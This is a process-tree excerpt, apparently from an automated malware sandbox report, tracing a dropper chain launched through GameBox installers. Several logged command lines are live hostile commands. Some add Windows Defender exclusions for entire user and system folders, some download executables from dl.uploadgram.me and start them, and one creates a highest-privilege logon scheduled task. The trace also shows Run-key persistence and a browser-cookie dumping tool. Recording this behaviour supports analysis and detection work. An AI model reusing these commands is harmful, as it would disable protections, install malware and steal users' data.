                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  26⤵
                                                                                                                                                                                    PID:8896
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      27⤵
                                                                                                                                                                                        PID:9208
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          28⤵
                                                                                                                                                                                            PID:7632
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                              29⤵
                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                              PID:2496
                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                ping RJMQBVDN -n 30
                                                                                                                                                6⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6188
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks computer location settings
                                                                                                                                        PID:5480
                                                                                                                                        • C:\Users\Admin\Documents\wAx29BBk0oSs1XHbLSApP0Tl.exe
                                                                                                                                          "C:\Users\Admin\Documents\wAx29BBk0oSs1XHbLSApP0Tl.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          PID:6860
                                                                                                                                        • C:\Users\Admin\Documents\gtjWe6hih2nPwEINX3qK75cc.exe
                                                                                                                                          "C:\Users\Admin\Documents\gtjWe6hih2nPwEINX3qK75cc.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          PID:6956
                                                                                                                                        • C:\Users\Admin\Documents\b3Cnxkq7Ma7PY_zfyFl7UaO8.exe
                                                                                                                                          "C:\Users\Admin\Documents\b3Cnxkq7Ma7PY_zfyFl7UaO8.exe"
                                                                                                                                          3⤵
                                                                                                                                            PID:6976
                                                                                                                                          • C:\Users\Admin\Documents\MpQriLXfQvqWA_8gjnz39s7c.exe
                                                                                                                                            "C:\Users\Admin\Documents\MpQriLXfQvqWA_8gjnz39s7c.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:7072
                                                                                                                                          • C:\Users\Admin\Documents\RM2BUE79BLYROfpIG2dX3FvD.exe
                                                                                                                                            "C:\Users\Admin\Documents\RM2BUE79BLYROfpIG2dX3FvD.exe"
                                                                                                                                            3⤵
                                                                                                                                              PID:7100
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6997543.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6997543.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:5404
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8838579.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8838579.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                  PID:7304
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3682603.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3682603.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:6952
                                                                                                                                                • C:\Users\Admin\Documents\PpcY_xznCsfTc_ENIhVSV6En.exe
                                                                                                                                                  "C:\Users\Admin\Documents\PpcY_xznCsfTc_ENIhVSV6En.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  PID:7164
                                                                                                                                                • C:\Users\Admin\Documents\ZlIUWXxDjsG9Qjk9kRwyJ1Gq.exe
                                                                                                                                                  "C:\Users\Admin\Documents\ZlIUWXxDjsG9Qjk9kRwyJ1Gq.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:7064
                                                                                                                                                  • C:\Users\Admin\Documents\tALlfzqornw4kqRwYup1erlz.exe
                                                                                                                                                    "C:\Users\Admin\Documents\tALlfzqornw4kqRwYup1erlz.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:7056
                                                                                                                                                    • C:\Users\Admin\Documents\PRXyPUxR1NvTRHJrwulvGhqx.exe
                                                                                                                                                      "C:\Users\Admin\Documents\PRXyPUxR1NvTRHJrwulvGhqx.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:7048
                                                                                                                                                      • C:\Users\Admin\Documents\8KGPwMXhJAoXBkNgXBS3rbD4.exe
                                                                                                                                                        "C:\Users\Admin\Documents\8KGPwMXhJAoXBkNgXBS3rbD4.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:4736
                                                                                                                                                      • C:\Users\Admin\Documents\RpWFA9lS6v6dlcAkwdQecB0w.exe
                                                                                                                                                        "C:\Users\Admin\Documents\RpWFA9lS6v6dlcAkwdQecB0w.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:6812
                                                                                                                                                      • C:\Users\Admin\Documents\e1jAsf_kY2obsrb1DG1Nju8W.exe
                                                                                                                                                        "C:\Users\Admin\Documents\e1jAsf_kY2obsrb1DG1Nju8W.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:7032
                                                                                                                                                        • C:\Users\Admin\Documents\e1jAsf_kY2obsrb1DG1Nju8W.exe
                                                                                                                                                          C:\Users\Admin\Documents\e1jAsf_kY2obsrb1DG1Nju8W.exe
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5824
                                                                                                                                                        • C:\Users\Admin\Documents\DqmOr8lJbal6NTuwtNq2Qz2Y.exe
                                                                                                                                                          "C:\Users\Admin\Documents\DqmOr8lJbal6NTuwtNq2Qz2Y.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6988
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                              4⤵
                                                                                                                                                                PID:7336
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:7984
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4384
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:6328
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:8472
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:7296
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            PID:8248
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            PID:8440
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:6028
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:8132
                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:8572
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:5700
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:9300
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:10236
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:9840
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:5144
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                PID:9168
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:8040
                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                      PID:8896
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:8700
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                PID:4640
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:7652
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:7484
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:4328
                                                                                                                                                                                            • C:\Users\Admin\Documents\EF_3bdT40kDN0hWNoQTsS1Lk.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\EF_3bdT40kDN0hWNoQTsS1Lk.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:6872
                                                                                                                                                                                              • C:\Users\Admin\Documents\K6JtXQnkUxP2Fx643_4qGmXL.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\K6JtXQnkUxP2Fx643_4qGmXL.exe"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:6928
                                                                                                                                                                                                • C:\Users\Admin\Documents\K6JtXQnkUxP2Fx643_4qGmXL.exe
                                                                                                                                                                                                  C:\Users\Admin\Documents\K6JtXQnkUxP2Fx643_4qGmXL.exe
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5260
                                                                                                                                                                                                • C:\Users\Admin\Documents\1wBi92Cp24Eh8BikeblgmKGj.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\1wBi92Cp24Eh8BikeblgmKGj.exe"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:800
                                                                                                                                                                                                    • C:\Users\Admin\Documents\1wBi92Cp24Eh8BikeblgmKGj.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\1wBi92Cp24Eh8BikeblgmKGj.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                  • C:\Users\Admin\Documents\pinfYjUZbEn5zMkXDM5_jAbt.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\pinfYjUZbEn5zMkXDM5_jAbt.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:6880
                                                                                                                                                                                                    • C:\Users\Admin\Documents\v8Hfv0H_Wg2d6mMvxjcQ894m.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\v8Hfv0H_Wg2d6mMvxjcQ894m.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:6968
                                                                                                                                                                                                      • C:\Users\Admin\Documents\v8Hfv0H_Wg2d6mMvxjcQ894m.exe
                                                                                                                                                                                                        C:\Users\Admin\Documents\v8Hfv0H_Wg2d6mMvxjcQ894m.exe
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:7312
                                                                                                                                                                                                      • C:\Users\Admin\Documents\_RPMNVQXTLGIQZ8ve2qjOR9O.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\_RPMNVQXTLGIQZ8ve2qjOR9O.exe"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:3428
                                                                                                                                                                                                        • C:\Users\Admin\Documents\_RPMNVQXTLGIQZ8ve2qjOR9O.exe
                                                                                                                                                                                                          C:\Users\Admin\Documents\_RPMNVQXTLGIQZ8ve2qjOR9O.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:7972
                                                                                                                                                                                                          • C:\Users\Admin\Documents\_RPMNVQXTLGIQZ8ve2qjOR9O.exe
                                                                                                                                                                                                            C:\Users\Admin\Documents\_RPMNVQXTLGIQZ8ve2qjOR9O.exe
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:7372
                                                                                                                                                                                                            • C:\Users\Admin\Documents\_RPMNVQXTLGIQZ8ve2qjOR9O.exe
                                                                                                                                                                                                              C:\Users\Admin\Documents\_RPMNVQXTLGIQZ8ve2qjOR9O.exe
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:7628
                                                                                                                                                                                                            • C:\Users\Admin\Documents\EyzA7uSCi9dzFYdG7ZSDFaNn.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\EyzA7uSCi9dzFYdG7ZSDFaNn.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:7044
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-VODUU.tmp\EyzA7uSCi9dzFYdG7ZSDFaNn.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-VODUU.tmp\EyzA7uSCi9dzFYdG7ZSDFaNn.tmp" /SL5="$3050A,138429,56832,C:\Users\Admin\Documents\EyzA7uSCi9dzFYdG7ZSDFaNn.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:4716
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-8AF1I.tmp\Setup.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-8AF1I.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                    PID:6200
                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                      PID:6348
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282274 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:6528
                                                                                                                                                                                                                • C:\Users\Admin\Documents\e3xfqbwhEwYzYRie61T5AXgk.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\e3xfqbwhEwYzYRie61T5AXgk.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4592
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\nsJG1_im3anZUrKBWm17GrfZ.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\nsJG1_im3anZUrKBWm17GrfZ.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4248
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\nsJG1_im3anZUrKBWm17GrfZ.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\nsJG1_im3anZUrKBWm17GrfZ.exe" -q
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:7632
                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5148
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:2628
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RM0KH.tmp\MediaBurner2.tmp
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RM0KH.tmp\MediaBurner2.tmp" /SL5="$20304,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    PID:5648
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-D6THF.tmp\3377047_logo_media.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-D6THF.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                      PID:5724
                                                                                                                                                                                                                      • C:\Program Files\Windows Security\SOWUUFONCY\ultramediaburner.exe
                                                                                                                                                                                                                        "C:\Program Files\Windows Security\SOWUUFONCY\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:7328
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-60KJ2.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-60KJ2.tmp\ultramediaburner.tmp" /SL5="$2030C,281924,62464,C:\Program Files\Windows Security\SOWUUFONCY\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                            PID:6624
                                                                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:7568
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\b8-6c7b3-74c-6d38e-dfd2efc0fd119\Jetotizhama.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\b8-6c7b3-74c-6d38e-dfd2efc0fd119\Jetotizhama.exe"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                            PID:7028
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\91-753b5-23b-49999-2da2feecf8057\SHashilobepae.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\91-753b5-23b-49999-2da2feecf8057\SHashilobepae.exe"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:6988
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\al2cwlfp.mle\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:8832
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\al2cwlfp.mle\GcleanerEU.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\al2cwlfp.mle\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:8468
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aicai15z.yie\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:9028
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\aicai15z.yie\installer.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\aicai15z.yie\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:8620
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kofwfzfy.0av\ufgaa.exe & exit
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:9156
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ynzinwaa.izg\anyname.exe & exit
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:4968
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ynzinwaa.izg\anyname.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ynzinwaa.izg\anyname.exe
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:8000
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ynzinwaa.izg\anyname.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ynzinwaa.izg\anyname.exe" -q
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:6628
                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:7056
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kvsyvcht.chy\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:8824
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kvsyvcht.chy\gcleaner.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\kvsyvcht.chy\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:9196
                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mshcmkct.xx5\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                      PID:9192
                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Process spawned unexpected child process
